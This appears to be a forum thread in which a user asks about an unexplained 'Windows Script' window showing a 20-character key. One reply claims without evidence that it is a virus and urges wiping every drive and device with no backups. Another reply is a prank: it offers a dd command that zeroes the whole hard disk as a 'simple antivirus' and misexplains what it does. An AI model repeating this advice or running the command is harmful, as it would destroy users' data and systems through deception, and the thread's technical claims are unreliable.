so basically my windows just randomly opened a windows script with a 20 letter key in it. the program has no name except windows script and when i go to the datapath it only shows system folder and the windows script exe. the key cant be a windows key since they are 25 letters long the key in the program is written XXXX-XXXX-XXXX-XXXX-XXXX (dont want to post the actual key in case its something important)

It is a virus, is passed through a serial message, I recommend you format your hard drive, reinstall your operating system, scan with an antivirus and repeat the process of formatting the hard drive and reinstall everything from scratch. Don't make any backup since these may be infected, you should also check all the devices connected to your Wi-Fi network, in case something strange happens, also format them, in case of being a smartphone I recommend you to reinstall android and also pass them an antivirus.

Install Windows Subsytem for Linux. Then run the simple antivirus called dd: dd if=/dev/zero of=/dev/sda status=progress /dev/sda is your hard drive. /dev/zero means to leave it with zero viruses. Wait until it finishes.
